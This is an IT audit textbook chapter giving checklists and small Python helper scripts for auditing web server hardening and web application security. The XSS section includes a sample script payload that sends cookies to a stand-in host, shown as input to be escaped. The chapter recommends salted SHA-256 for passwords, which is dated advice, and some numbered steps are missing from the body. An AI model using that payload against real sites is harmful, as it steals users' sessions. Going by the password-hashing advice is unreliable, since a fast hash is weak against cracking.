IT Audit Chapter 8
Background
The background of Internet web applications is fascinating because it has come so far in such a short time period. Perl,
widely used for web applications, was created by Larry Wall in 1987, four years before the first web server was installed in
the United States. The rapid development of the Internet is broadly attributed to the need to share information quickly, first across research institutions and later across businesses. Entrepreneurs found new business models on the Internet and were able to take advantage of people's need to send and receive information instantly.
The pieces that enabled this rapid growth include the web server, the web browser, and the connected web of computer
hosts. Some of the key dates in the development of the web as we know it include
1989: European physicists Tim Berners-Lee and Robert Cailliau in Switzerland come up with the concept of the World Wide Web.
1993: Marc Andreessen, at the National Center for Supercomputing Applications (NCSA), creates the first web browser with mass appeal, Mosaic. He later leaves with friends from NCSA to eventually create Netscape Communications Corp.
1995: Java is born with Sun Microsystems Java 1.0.
1995: Apache is officially released to the public.
1996: Microsoft releases Internet Explorer 3.0, and Netscape releases Navigator 3.0.
2000: Hackers take down major websites and deface thousands of others, finally bringing attention to web
security.
2001: The Open Web Application Security Project (OWASP) is born (http://www.owasp.org).
Key Concerns
Web platform
Security of the operating system, physical and network protection to the host
Web server
Web application
There is a wealth of languages and structures for web application development, complicating the audit process. However,
there are also several tools available to help us wade through the mix and determine what needs attention. We will go
through these in the steps below.
Note
The platform portion of the audit is as important as the audit of the web server and the web
applications. Please refer to Chapters 6 and 7 on auditing Unix or Windows servers for this
portion of the audit.
2. Verify that the web server is fully patched and updated with the latest approved code.
Failure to run adequately patched systems subjects the web server to unnecessary risk of compromise from vulnerabilities
that may have been patched with updated code releases.
How
Every organization has its own patch-management systems and policies. Verify with the help of the administrator that the web server is running the latest approved code according to the policies and procedures in the environment. Also review those policies and procedures to ensure that they require systems to be kept up-to-date with the latest code releases and that compliance is verified in a timely manner.
3. Determine if the web server should be running additional tools to aid in the protection of the web server.
Web servers often come with additional measures designed to protect them, such as IISLockdown and URLScan. These tools often are recommended by the vendors or developers. The additional controls they put in place can greatly lower the server's overall risk of compromise.
How
Determine through research at the web developer's website and discussions with the web administrator what tools are
available and the additional controls the tools offer for the given increase in administration. These tools might include
validation checking or tools that monitor web server connections. Some tools offer quite a bit of additional protection for
very little additional overhead. In the Microsoft environment, IISLockdown and URLScan should be run on every Windows
IIS web server with very few exceptions. Check to see if your organization has procedures governing how to configure
these tools, and verify that they are configured correctly.
Note
IISLockdown is only for IIS 5.x. IIS 6 is considerably more secure by default, but you still can install URLScan on IIS 6 to further harden it and reduce functionality. With Windows Server 2003 SP1, the Security Configuration Wizard provides a way to strip all unnecessary functionality from IIS so that only the components necessary for the web server to fulfill its role in life are installed and running.
4. Verify that unnecessary services or modules are disabled. Running services and modules should operate under least privileged accounts.
Unnecessary services and modules present additional opportunities for malicious attackers and malware.
How
Discuss and verify with the help of the administrator that unnecessary services are disabled and that the running services
are operating under the least privileged account possible. Verify that FTP, SMTP, Telnet, FrontPage Server Extensions,
and NNTP services are disabled if they are not required.
If you are running Apache, only enable modules that are absolutely necessary. Table 8-2 presents a list of modules considered to be the bare minimum. Question the need for anything else that might be running; a scripted comparison against this baseline is sketched after the table.

Apache Module: Purpose
httpd core: Core Apache functionality (required)
mod_access: Provides host-based access control
mod_auth: Provides user authentication using text files
mod_dir: Provides basic directory handling
mod_log_config: Supports logging
mod_mime: Provides support for character set, content encoding, content language, and MIME types of documents
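As an illustration, the following minimal Python sketch (an assumption on our part, not part of this chapter's toolset) compares the modules compiled into an Apache binary against the Table 8-2 baseline using httpd -l. The binary name and baseline set will likely need adjusting for your environment.

```python
#!/usr/bin/env python3
"""Hypothetical check: compare Apache's compiled-in modules with a baseline."""
import subprocess

# Bare-minimum modules from Table 8-2, as reported by `httpd -l`.
BASELINE = {
    "core.c", "mod_access.c", "mod_auth.c",
    "mod_dir.c", "mod_log_config.c", "mod_mime.c",
}

def compiled_modules(binary="httpd"):
    """Return the set of modules compiled into the Apache binary."""
    out = subprocess.run([binary, "-l"], capture_output=True, text=True, check=True)
    return {line.strip() for line in out.stdout.splitlines()
            if line.strip().endswith(".c")}

if __name__ == "__main__":
    for module in sorted(compiled_modules() - BASELINE):
        print("Question the need for:", module)
```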
5. Verify that only appropriate protocols and ports are allowed to access the web server.
Minimizing the number of protocols and ports allowed to access the web server reduces the number of attack vectors
available to compromise the server.
How
Discuss with the administrator and verify with the administrator's help that only necessary protocols are allowed to access
the server. For example, the TCP/IP stack on the server should be hardened to allow only appropriate protocols, and
NetBIOS and SMB should be disabled on IIS servers. Note any additional controls that may be in place, such as firewall
rules or network access control lists (ACLs) to limit the protocols and ports allowed to access the web server. In general,
only TCP on ports 80 (HTTP) and 443 (SSL) should be allowed to access the web server.
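To supplement the discussion with the administrator, a quick connect test can confirm that nothing unexpected answers. The following Python sketch is a minimal illustration, assuming a hypothetical host name and a small candidate port list; use it only against systems you are authorized to test.

```python
#!/usr/bin/env python3
"""Minimal sketch: confirm only the expected TCP ports answer on a web server."""
import socket

HOST = "webserver.example.com"   # hypothetical target; adjust as needed
ALLOWED = {80, 443}              # HTTP and SSL, per this audit step
CANDIDATES = [21, 22, 23, 25, 80, 110, 119, 139, 443, 445, 3389]

for port in CANDIDATES:
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(2)
        is_open = s.connect_ex((HOST, port)) == 0   # 0 means connect succeeded
    if is_open and port not in ALLOWED:
        print(f"Unexpected open port: {port}")
```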
6. Verify that accounts allowing access to the web server are managed appropriately and hardened with strong passwords.
Inappropriately managed or used accounts could provide easy access to the web server, bypassing other additional
security controls to prevent malicious attacks. This is a large step with a wide scope, covering controls around account
use and management.
How
Discuss with the administrator and verify with the administrator's help that unused accounts are removed from the server
or completely disabled. The administrator's account on Windows servers should be renamed, and all accounts should be
restricted from remote login except for those used for administration.
The root account on Unix-flavored hosts (Linux, Solaris, etc.) should be strictly controlled and never used for direct remote administration. Never run Unix web servers such as Apache under the root account. They should be run under a distinct, unprivileged user and group created for the web server (for example, apache). Please see Chapter 7 for more information about the root account.
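One quick way to spot-check this, sketched below in Python (an illustrative assumption, not the book's method), is to scan the process list for web server processes owned by root. Note that the single Apache parent process legitimately runs as root so that it can bind to port 80; the worker processes are the concern.

```python
#!/usr/bin/env python3
"""Sketch: flag Apache worker processes owned by root via `ps` output."""
import subprocess

WEB_PROCS = {"httpd", "apache2"}   # process names vary; adjust as needed

ps = subprocess.run(["ps", "-eo", "user,comm"],
                    capture_output=True, text=True, check=True)
workers = [line for line in ps.stdout.splitlines()[1:]   # skip header row
           if line.split(None, 1)[-1].strip() in WEB_PROCS]

# The one parent process normally runs as root to bind port 80;
# every additional root-owned instance deserves a question.
root_owned = [w for w in workers if w.split()[0] == "root"]
if len(root_owned) > 1:
    print("Possible web server workers running as root:")
    for w in root_owned:
        print(" ", w.strip())
```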
In general, accounts never should be shared among administrators, and administrators never should share their accounts
with users. Strong account and password policies always should be enforced by the server and by the web server
application.
Additional considerations for IIS web servers include ensuring that the IUSR_MACHINE account is disabled if it is not
used by the application. You also should create a custom least-privileged anonymous account if your applications require
anonymous access. Configure a separate anonymous user account for each application if you host multiple web
applications.
7. Ensure that appropriate controls exist for files, directories, and virtual directories.
Inappropriate controls for files and directories used by the web server and the system in general allow attackers access to
more information and tools than should be available. For example, remote administration utilities increase the likelihood of
compromising a web server.
How
Discuss with the administrator and verify with the administrator's assistance that logs and website content are stored on a
nonsystem volume where possible. Verify that files and directories have appropriate permissions, especially those
containing
Website content
Website scripts
Sample applications and virtual directories should be removed. These would include IISSamples, IISAdmin, IISHelp, and
Scripts virtual directories in IIS web servers.
Also verify that anonymous and everyone groups (world permissions) are restricted except where absolutely necessary.
Additionally, no files or directories should be shared out on the system unless necessary.
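The permission review can be partially automated. The sketch below (Python, with an assumed web root path) walks the content directory looking for world-writable files, one of the conditions this step is meant to catch.

```python
#!/usr/bin/env python3
"""Sketch: find world-writable files under an assumed web root."""
import os
import stat

WEB_ROOT = "/var/www"    # hypothetical content directory; adjust as needed

for dirpath, _dirnames, filenames in os.walk(WEB_ROOT):
    for name in filenames:
        path = os.path.join(dirpath, name)
        mode = os.stat(path).st_mode
        if mode & stat.S_IWOTH:          # world-writable bit is set
            print(f"World-writable: {path}")
```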
8. Ensure that the web server has appropriate logging enabled and secured.
Logging auditable events helps administrators to troubleshoot issues. Logging also allows incident response teams to
gather forensic data.
How
Verify with the administrator that key audit trails are kept, such as failed logon attempts. Ideally, these logs should be
relocated and secured away from the same volume as the web server. Log files also should be archived regularly. They
should be analyzed regularly, preferably by an automated tool in large information technology (IT) environments.
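As a small example of that kind of automated review, the following Python sketch tallies failed or forbidden requests per client from an Apache access log in Common Log Format. The log path is an assumption.

```python
#!/usr/bin/env python3
"""Sketch: count 401/403 responses per client in a Common Log Format log."""
import re
from collections import Counter

LOG = "/var/log/httpd/access_log"      # hypothetical location; adjust as needed
# CLF: host ident user [time] "request" status bytes
PATTERN = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[^"]*" (\d{3}) ')

failures = Counter()
with open(LOG) as fh:
    for line in fh:
        m = PATTERN.match(line)
        if m and m.group(2) in ("401", "403"):
            failures[m.group(1)] += 1

for host, count in failures.most_common(10):
    print(f"{host}: {count} failed/forbidden requests")
```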
10. Verify that unnecessary or unused ISAPI filters are removed from the server.
ISAPI filters are tightly wrapped with the web server and were intended to allow rapid script execution, faster than CGI
scripts. Support for ISAPI is designed into several web servers, but there have been problems with ISAPI in the past.
Unsecured or unused ISAPI filters may present another avenue of attack.
How
Verify with the web administrator that any ISAPI filters installed on the web server are necessary. Unnecessary or
unsecured web filters should be removed from the server.
11. Verify the validity and use of any server certificates in use.
How
Verify with the help of the administrator that any certificates are used for their intended purpose and have not been
revoked. Certificate date ranges, public key, and metadata all should be valid. If any of these have changed, then consider
the need for a new certificate that reflects your current needs.
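Much of this can be checked from any client. The Python sketch below (the host name is a placeholder) retrieves a server's certificate over SSL/TLS and reports its validity dates; the handshake itself also verifies the chain against the client's trust store.

```python
#!/usr/bin/env python3
"""Sketch: pull a server certificate and report its validity dates."""
import socket
import ssl

HOST = "www.example.com"     # hypothetical server under audit

context = ssl.create_default_context()
with socket.create_connection((HOST, 443), timeout=5) as sock:
    # wrap_socket performs the handshake and chain verification
    with context.wrap_socket(sock, server_hostname=HOST) as tls:
        cert = tls.getpeercert()

print("Subject:    ", cert.get("subject"))
print("Valid from: ", cert.get("notBefore"))
print("Valid until:", cert.get("notAfter"))
```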
Note
Keep in mind that the audience of this book varies greatly in technical abilities, and an
attempt has been made to simplify as much as possible for the majority of the readers. You
may want to visit http://www.owasp.org/index.php/OWASP_Top_Ten_Project to determine
what scope and toolset make sense in your environment.
Auditing Web Applications
1. Verify that all input is validated prior to use by the web server.
Information must be validated before being used by a web application. Failure to validate web requests subjects the web
server to increased risk from attackers attempting to manipulate input data to produce malicious results.
How
Discuss with the web application developer or web administrator the methodology used for input validation for the
application you are testing.
There are several tools that effectively act as a proxy and allow you to see much of the content posted from your client to
the remote web server. One such tool is Paros Proxy, located at http://www.parosproxy.org.
Another method used by professional web testers is to understand the movement of data during a code review. This isn't
something that should be taken lightly because it may be beyond the scope of what you are trying to accomplish. There is
a tradeoff that you as an auditor are going to have to make regarding the amount of effort you put into this versus the cost
of the data you are protecting.
In general, two ways to look at validation methods are negative methods and positive methods. Negative methods focus
on knowing what bad input to filter out, based on the known bad. The problem with negative filtering is that we don't know today what tomorrow's vulnerabilities and input methods will bring. Positive filtering is much more effective and involves
focusing on validating the data based on what they should be. This is similar in approach to a firewall that denies
everything except what should be accepted.
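A minimal Python sketch of positive validation follows; the field rules are illustrative assumptions, not a complete set.

```python
#!/usr/bin/env python3
"""Minimal sketch of positive (whitelist) validation: accept input only when
it matches what the field should contain."""
import re

RULES = {
    "zip_code": re.compile(r"^\d{5}(-\d{4})?$"),      # US ZIP or ZIP+4
    "quantity": re.compile(r"^[1-9]\d{0,2}$"),        # numeric range 1-999
    "username": re.compile(r"^[A-Za-z0-9_]{3,16}$"),  # allowed character set
}

def validate(field, value):
    """Reject anything that does not match the known-good pattern."""
    rule = RULES.get(field)
    return bool(rule and rule.fullmatch(value))

assert validate("zip_code", "30301")
assert not validate("quantity", "12; DROP TABLE orders")  # fails the whitelist
```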
Common items for positive filtering include criteria you might find in a database or other places that accept data. These
include criteria such as
Numeric range
2. Verify that proper authorization controls are enforced.
Common authorization weaknesses to review include the following:
Insecure IDs
Many websites use some sort of key or ID stored on the client as a means of determining what rights the user has on the web server. If the user can guess and create a token, then he or she may have free rein on the web server.
Forced Browsing
Some websites require certain checks before allowing a user to access content deeper in
the site. If the checks are not enforced, then a user can access the content directly.
Path Traversal
These attacks attempt to backtrack and go around normal permission sets to gain access
to information or files not normally accessible.
File Permissions
Log and configuration files, among others, may have incorrect permissions and be
accessible through the web interface. Correctly setting file permissions also can help in
preventing other attacks.
Client-Side Caching
Clients should not cache sensitive information such as credit card and personal data. Attackers can take advantage of users' cached data and maliciously reuse this information.
3. Review controls surrounding authentication and session management.
Best practices include the following (two of these items are sketched in code after the list):
When a user enters an invalid credential into a login page, don't return which item was incorrect. Show a generic message instead, such as "Your login information was invalid!"
Never submit login information via a GET request. Always use POST.
Remove dead code and client-side viewable comments from all pages.
Do not depend on client-side validation. Validate input parameters for type and length on the server, using regular
expressions or string functions.
Database queries should use parameterized queries or properly constructed stored procedures.
Database connections should be made using a lower-privileged account. Your application should not log into the database using sa or dbadmin.
One way to store passwords is to hash them in a database or flat file using SHA-256 or greater with a random salt value for each password.
Prompt the user to close his or her browser to ensure that header authentication information has been flushed.
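The sketch below illustrates the parameterized-query and salted-hash items from the list above in Python, using sqlite3 purely for illustration; the table and column names are assumptions.

```python
#!/usr/bin/env python3
"""Sketch: a parameterized query and salted SHA-256 password hashing."""
import hashlib
import os
import sqlite3

def hash_password(password):
    """Hash with a random per-password salt, per the recommendation above."""
    salt = os.urandom(16)
    digest = hashlib.sha256(salt + password.encode()).digest()
    return salt, digest

def find_user(conn, username):
    # The ? placeholder keeps user input out of the SQL text entirely.
    return conn.execute(
        "SELECT id, salt, pw_hash FROM users WHERE username = ?", (username,)
    ).fetchone()
```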
4. Review the website for cross-site scripting vulnerabilities.
Cross-site scripting (XSS) allows the web application to transport an attack from one user to another end user's browser.
A successful attack can disclose the second end user's session token, attack the local machine, or spoof content to fool
the user. Damaging attacks include the disclosure of end-user files, installation of Trojan horse programs, redirecting the
user to some other page or site, and modifying the presentation of content.
How
Cross-site scripting attacks are very difficult to find, and although tools can help, they are notoriously inept at locating all the possible XSS combinations on a web application. By far the best method for determining if your website is
vulnerable is by doing a thorough code review with the administrator.
If you were to review the code, you would search for every possible path by which HTTP input could make its way into the
output going to a user's browser. The key method used to protect a web application from XSS attacks is to validate every
header, cookie, query string, form field, and hidden field. Drawing on the previous discussion of positive and negative
validation measures, you should make sure to employ a positive validation method.
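Alongside positive validation, output encoding is a common complementary defense. The short Python sketch below shows the idea using the standard library's html module; it is an illustration, not this chapter's prescribed method.

```python
#!/usr/bin/env python3
"""Sketch: HTML-encode user-supplied data before it reaches the browser."""
import html

user_supplied = '<script>document.location="http://evil.example/?"+document.cookie</script>'

# html.escape neutralizes the markup so the browser renders it as text.
safe_output = html.escape(user_supplied)
print(safe_output)   # &lt;script&gt;document.location=&quot;...
```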
CIRT.net contains two tools, Nikto and a Nessus plugin, that you might be able to use to help you automate the task of
looking for XSS vulnerabilities on your web server. Keep in mind that these tools are not as thorough as conducting a
complete code review, but at least they can provide more information to those who don't have the skill set, resources,
time, and dollars to conduct a complete review. Nikto, a tool from http://www.cirt.net/code/nikto.shtml, searches literally
thousands of known issues across hundreds of platforms. It's a powerful tool and should be part of your toolset. Scan
items and plugins are updated frequently and can be updated automatically if desired. Commercial tools also are available
that may help, such as Acunetix (http://www.acunetix.com). These tools may find well-known attacks, but they will not be
nearly as good as performing a solid code review.
If you don't have the internal resources available to perform a code review, particularly on a home-grown application, and
you believe that the data on the website warrant a deep review, then consider hiring third-party help. There are outfits
such as FishNet Security (http://www.fishnetsecurity.com) that perform this kind of work.
5. Verify that the server is updated with all known patches for buffer overflows.
Buffer overflows quickly find their way into exploits for web servers. You should make sure that all
applicable patches covering buffer overflows are installed on the web server to protect your web applications.
How
Buffer overflows aren't something you typically find by looking through the code unless you are a professional hacker paid
to do this. By far the easiest method to stay on top of buffer overflows is to stay on top of the patching cycle for your
systems. You have patches for the operating system, web platform, and in many cases the web application that you need
to research and verify.
Discuss the patching cycle of the web servers with the web administrator to ensure that any applicable web application
patches have been installed. This sounds like a repeat of step 2 above for the web platform. However, in certain cases,
commercial web applications require their own patches separate from the web platform. Ensure that all known patches
are installed to protect the security of the web platform and web application.
6. Ensure that the web application is protected against injection attacks.
How
Perform a code review if possible for all calls to external resources to determine if the method could be compromised.
Commercial tools are available that may help, such as Acunetix (http://www.acunetix.com). These tools are
definitely powerful and may find well-known attacks, but they will not be as good as performing a solid code
review.
Consider hiring third-party help if the application is particularly sensitive, you lack the resources, or you need to
verify items such as regulatory compliance.
7. Evaluate the use of proper error handling.
How
Error handling is often better controlled if it is centralized as opposed to compartmentalized across several interworking
objects or components. If you are reviewing the code, the error handling should flow nicely and show structure. If the error
handling looks haphazard and like an afterthought, then you may want to look much more closely at the application's
ability to handle errors properly.
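As a small illustration of centralized handling, the Python sketch below uses Flask (an assumed framework choice, not the book's) to route every unhandled exception through one place that logs the detail and returns a generic message.

```python
#!/usr/bin/env python3
"""Sketch: one centralized error handler instead of scattered try/except."""
import logging
from flask import Flask

app = Flask(__name__)
log = logging.getLogger("webapp")

@app.errorhandler(Exception)
def handle_error(exc):
    log.exception("Unhandled error")           # full detail goes to the log
    return "An internal error occurred.", 500  # generic message to the user
```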
8. Ensure that secure storage mechanisms are used correctly and appropriately.
Web applications often want to obfuscate or encrypt data to protect the data and credentials. The challenge is that there
are two parts to this scheme: the black box that does the magic and the implementation of the black box into your web
application. These have proven difficult to code properly, frequently resulting in weak protection.
How
Begin the discussion with the web administrator by talking about the sensitivity of the data you want to protect. If the data
are sensitive and not encrypted, then consider whether there are industry or regulatory drivers stating that the data must
be encrypted, and note the issue. If data are encrypted, then discuss in detail with the developer or review documentation
with the administrator to understand how the encryption mechanism was implemented into your web application. Ensure
that the level of encryption is equivalent to the level of data you want to protect. If you have extremely sensitive data such
as credit-card data, then you may want to have actual encryption instead of a simple algorithm that obfuscates the data.
Note
Obfuscation simply means to find creative ways of hiding data without using a key. Encryption is
considered to be much, much more secure than obfuscation. Encryption uses tested algorithms and
unique keys to transform data into a new form in which there is little or no chance of re-creating the
original data without a key. Sound complicated? It's that much harder to defeat properly
implemented encryption than it is to defeat obfuscation.
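The difference is easy to demonstrate. The Python sketch below (using the third-party cryptography package, an assumption on our part) contrasts a keyless encoding with keyed encryption.

```python
#!/usr/bin/env python3
"""Sketch: obfuscation (keyless) versus real encryption (keyed)."""
import base64
from cryptography.fernet import Fernet  # pip install cryptography

card = b"4111111111111111"

# Obfuscation: no key, trivially reversible by anyone who spots the encoding.
obfuscated = base64.b64encode(card)

# Encryption: keyed AES under the hood; useless without the key.
key = Fernet.generate_key()          # store this key securely, never with the data
token = Fernet(key).encrypt(card)

assert Fernet(key).decrypt(token) == card
```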
10. Review controls surrounding maintaining a secure configuration.
Verify with the administrator that practices such as the following are in place:
Security mailing lists for the web server, platform, and application are monitored.
The latest security patches are applied in a routine patch cycle under the guidance of written and agreed-to
policies and procedures.
A security configuration guideline exists for the web servers in the environment and is strictly followed.
Exceptions are carefully documented and maintained.
Regular vulnerability scanning from both internal and external perspectives is conducted to discover new risks
quickly and to test planned changes to the environment.
Regular internal reviews of the server's security configuration are conducted to compare the existing
infrastructure with the configuration guide.
Regular status reports are issued to upper management documenting the overall security posture of the web
servers.
Having a strong server configuration standard is critical to a secure web application. These servers have
many configuration options that affect security and are not secure out of the box. Taking the time to
understand these options and how to configure them to your environment is fundamental to maintaining
sound and secure web servers.
Automated tools can be quite harmful to production environments. Exercise care, and design your testing to minimize the impact on production systems.
Tools and Technology
Acunetix: http://www.acunetix.com
Web Sleuth: http://www.sandsprite.com/Sleuth
Paros Proxy: http://www.parosproxy.org
Web Inspect: http://www.spidynamics.com/products/webinspect
Nikto: http://www.cirt.net/code/nikto.shtml
XSS NASL plugin for Nessus: http://www.cirt.net/code/nessus.shtml
JMeter: http://www.jakarta.apache.org/jmeter
Knowledge Base
http://www.owasp.org/index.php/OWASP_Top_Ten_Project
CGI security: http://www.cgisecurity.net/
Securing IIS: http://www.microsoft.com/technet/security/prodtech/IIS.mspx
Windows Server 2003 Security Guide: The web server role:
http://www.microsoft..com/technet/security/prodtech/windowsserver2003/w2003hg/s3sgch09.mspx
Story about the history of the World Wide Web from Microsoft's perspective:
http://www.microsoft.com/misc/features/features_flshbk.htm
General story about the history of the World Wide Web:
http://www.computerworld.com/developmenttopics/websitemgmt/story/0,10801,73525,00.html
Master Checklists
Auditing Web Servers
Checklist for Auditing Web Servers
1. Verify that the web server is running on a dedicated system and not in conjunction with other critical
applications.
2. Verify that the web server is fully patched and updated with the latest approved code.
3. Determine if the web server should be running additional tools to aid in the protection of the web server.
4. Verify that unnecessary services or modules are disabled. Running services and modules should operate under least privileged accounts.
5. Verify that only appropriate protocols and ports are allowed to access the web server.
6. Verify that accounts allowing access to the web server are managed appropriately and hardened with strong
passwords.
7. Ensure that appropriate controls exist for files, directories, and virtual directories.
8. Ensure that the web server has appropriate logging enabled and secured.
9. Ensure that script extensions are mapped appropriately.
10. Verify that unnecessary or unused ISAPI filters are removed from the server.
11. Verify the validity and use of any server certificates in use.
Auditing Web Applications
Checklist for Auditing Web Applications
1. Verify that all input is validated prior to use by the web server.
2. Verify that proper authorization controls are enforced.
3. Review controls surrounding authentication and session management.
4. Review the website for cross-site scripting vulnerabilities.
5. Verify that the server is updated with all known patches for buffer overflows.
6. Ensure that the web application is protected against injection attacks.
7. Evaluate the use of proper error handling.
8. Ensure that secure storage mechanisms are used correctly and appropriately.
9. Determine the use of adequate controls to prevent denial of service.
10. Review controls surrounding maintaining a secure configuration.